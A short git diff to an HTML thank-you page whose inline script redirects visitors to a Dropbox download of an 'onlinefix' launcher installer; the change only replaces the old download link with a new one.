--- a/pages/ofmeThanks.html
+++ b/pages/ofmeThanks.html
@@ -68,7 +68,7 @@
         </div>
     </div>
     <script>
-        window.location.href = "https://www.dropbox.com/scl/fi/7anvcmyzu4ga602rzk9j8/onlinefix_launcher_installer?rlkey=cmof8kvm7o0vlre75et90mbx8&st=7o061yus&dl=1";
+        window.location.href = "https://www.dropbox.com/scl/fi/xq8ku70lo95y02m8r84ze/onlinefix_launcher_installer?rlkey=mekh1k1a6mu9vthiuiccgmjba&st=fzw8763b&dl=1";
     </script>
 </body>
 </html>
